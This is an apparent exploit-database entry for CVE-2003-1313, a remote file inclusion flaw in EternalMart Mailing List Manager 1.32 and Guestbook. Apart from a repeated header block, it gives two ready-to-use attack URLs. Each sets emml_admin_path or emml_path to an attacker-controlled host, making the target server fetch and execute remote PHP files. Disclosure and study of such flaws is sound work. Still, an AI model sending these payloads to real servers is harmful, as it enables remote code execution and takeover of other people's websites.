EternalMart Mailing List Manager 1.32 - Remote File Inclusion
| EKU-ID: 28673 | CVE: CVE-2003-1313;OSVDB-2261 | OSVDB-ID: |
| Author: frog | Published: 2003-10-04 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28673 | CVE: CVE-2003-1313;OSVDB-2261 | OSVDB-ID: |
| Author: frog | Published: 2003-10-04 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/8767/info EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver. http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will include the file : http://[attacker]/auth_func.php http://[target]/emml_email_func.php?emml_path=http://[attacker] will include the file : http://[attacker]/class.html.mime.mail.php